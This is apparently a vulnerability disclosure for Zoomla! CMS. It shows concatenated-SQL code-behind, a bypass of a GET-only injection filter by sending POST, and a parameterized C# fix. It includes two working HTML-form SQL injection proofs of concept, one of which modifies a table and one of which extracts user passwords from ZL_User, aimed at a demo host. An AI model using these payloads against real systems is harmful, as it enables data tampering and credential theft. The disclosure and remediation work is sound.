Zoomla! CMS: two files, two injections, five problem code snippets, and a bypass of the injection filter
The vendor has put real effort into security. Even so, with so many parameters and data type conversions involved, some will inevitably be missed, and we hope to keep digging. Injectable file: User/UserZone/StructView.aspx, parameter ID. Code-behind snippet:
    public void Page_list()
    {
        .....
        DataTable dataTable = this.user.Sel("StructureID like '%," + base.Request.QueryString["ID"] + ",%'", "");
        .......
    }

The ID parameter is concatenated straight into the SQL, but because the value is passed through the URL it is caught by the anti-injection check before it reaches this code. So we bypass the check by another route.
Application_BeginRequest (the application-level request check):

    private void Application_BeginRequest(object sender, EventArgs e)
    {
        if (base.Request.RequestType.ToUpper() == "GET" && ZoomlaSecurityCenter.GetData())
        {
            function.WriteMessage("Possible cause: the parameters you submitted are incorrect or contain malicious strings, or check whether the system has enabled the SQL anti-injection function!", "", "Illegal SQL injection or storage!");
        }
        if (base.Request.HttpMethod.ToUpper() == "POST" && HttpContext.Current.Request.Files.Count > 0)
        {
            ZoomlaSecurityCenter.CheckUpladFiles();
        }
        ....
    }

It can be concluded that the SQL injection defense only screens GET requests. A POST request carrying the same query string is not checked; the proof of concept is as follows:
    <form action="http://192.168.10.55:9992/User/UserZone/StructView.aspx?ID=SA';update ZL_3DMusic set MusicName='wooyun' where id=1 and ',%'='" method="post">
        <input id="Submit1" type="submit" value="submit" />
    </form>
Here any table can be modified; as a test, the MusicName field of ZL_3DMusic was set to wooyun.

Note: this injection point has been removed from the demo on the official website, but the download provided by the official website still contains it.

Second file: /User/userzone/logmanage/logsearchresult.aspx. Code snippet: the problem is in the page's code-behind methods. In OK_Click() (search handler 1) the parameters are:

    string text2 = base.Request.Form["age1"];
    string text3 = base.Request.Form["age2"];
    string text4 = base.Request.Form["sex"];
    string text5 = base.Request.Form["ltype"];

Problem code 1:

    text = text + " and userSex = " + text4;

Problem code 2:

    if (text5 != "")
    {
        text = text + " and logtypeid = '" + text5 + "'";
    }

In OK2_Click() (search handler 2) the parameters are:

    string text2 = base.Request.Form["sType"];
    string text3 = base.Request.Form["TypeStr"];

Problem code 1:

    if (!string.IsNullOrEmpty(text3))
    {
        text = text + " and username = '" + text3.Trim() + "'";
    }

Problem code 2:

    if (!string.IsNullOrEmpty(text3))
    {
        text = text + " and LogTitle = '" + text3.Trim() + "'";
    }
Code:
    <form action="http://demo.zoomla.cn/User/userzone/logmanage/logsearchresult.aspx" method="post">
        <input type="text" name="age1" id="age1" value="1" />
        <input type="text" name="age2" id="age2" value="1" />
        <input type="text" name="sex" id="sex" value="1" />
        <input type="text" name="ltype" id="ltype" value="6F9619FF-8B86-D011-B42D-00C04FC964FF' and 1=( select top 1 STUFF( UserPwd, 1, 0, UserName) from dbo.ZL_User )--" />
        <input id="Submit1" type="submit" value="submit" />
    </form>
Solution: the filtering is incomplete; POST requests need to be filtered as well.
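A hardened counterpart to the two code-behind snippets above, added here as an example rather than Zoomla's own code: it keeps the conditional WHERE-building of the original but binds every request value as a typed SqlParameter, so the query shape is fixed regardless of whether the GET-only filter runs. The table name LogTable, the nvarchar widths, and the integer/GUID types assumed for ID, sex and ltype are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

// Added example, not Zoomla's code. Column names come from the snippets above;
// the table name LogTable and the nvarchar widths are assumptions.
public static class SafeQueries
{
    // StructView.aspx: ID is validated as an integer and bound as a parameter,
    // so the LIKE pattern is assembled inside SQL, never from request text.
    public static SqlCommand UsersByStructure(SqlConnection conn, string id)
    {
        if (!int.TryParse(id, out int structureId))
            throw new ArgumentException("ID must be an integer");
        var cmd = conn.CreateCommand();
        cmd.CommandText = "SELECT * FROM ZL_User WHERE StructureID LIKE '%,' + @id + ',%'";
        cmd.Parameters.Add("@id", SqlDbType.NVarChar, 20).Value = structureId.ToString();
        return cmd;
    }

    // logsearchresult.aspx: same "append a condition only when the field is
    // non-empty" logic as the original, but every value is a typed parameter.
    public static SqlCommand SearchLogs(SqlConnection conn, string sex, string ltype, string userName, string logTitle)
    {
        var cmd = conn.CreateCommand();
        var where = new List<string>();
        if (!int.TryParse(sex, out int sexValue))   // the original concatenated this unquoted
            throw new ArgumentException("sex must be an integer");
        where.Add("userSex = @sex");
        cmd.Parameters.Add("@sex", SqlDbType.Int).Value = sexValue;
        if (!string.IsNullOrEmpty(ltype))
        {
            if (!Guid.TryParse(ltype, out Guid typeId))  // the PoC shows a GUID in this field
                throw new ArgumentException("ltype must be a GUID");
            where.Add("logtypeid = @ltype");
            cmd.Parameters.Add("@ltype", SqlDbType.UniqueIdentifier).Value = typeId;
        }
        AddText(cmd, where, "username", "@user", userName, 50);
        AddText(cmd, where, "LogTitle", "@title", logTitle, 200);
        cmd.CommandText = "SELECT * FROM LogTable WHERE " + string.Join(" AND ", where);
        return cmd;
    }

    // Column and parameter names are compile-time constants; only the value is bound.
    static void AddText(SqlCommand cmd, List<string> where, string column, string name, string value, int width)
    {
        if (string.IsNullOrEmpty(value)) return;
        where.Add(column + " = " + name);
        cmd.Parameters.Add(name, SqlDbType.NVarChar, width).Value = value.Trim();
    }
}
```

With values bound this way, the ltype payload from the proof of concept above fails the GUID check before any SQL is built, and a value that does parse can only ever be compared as data.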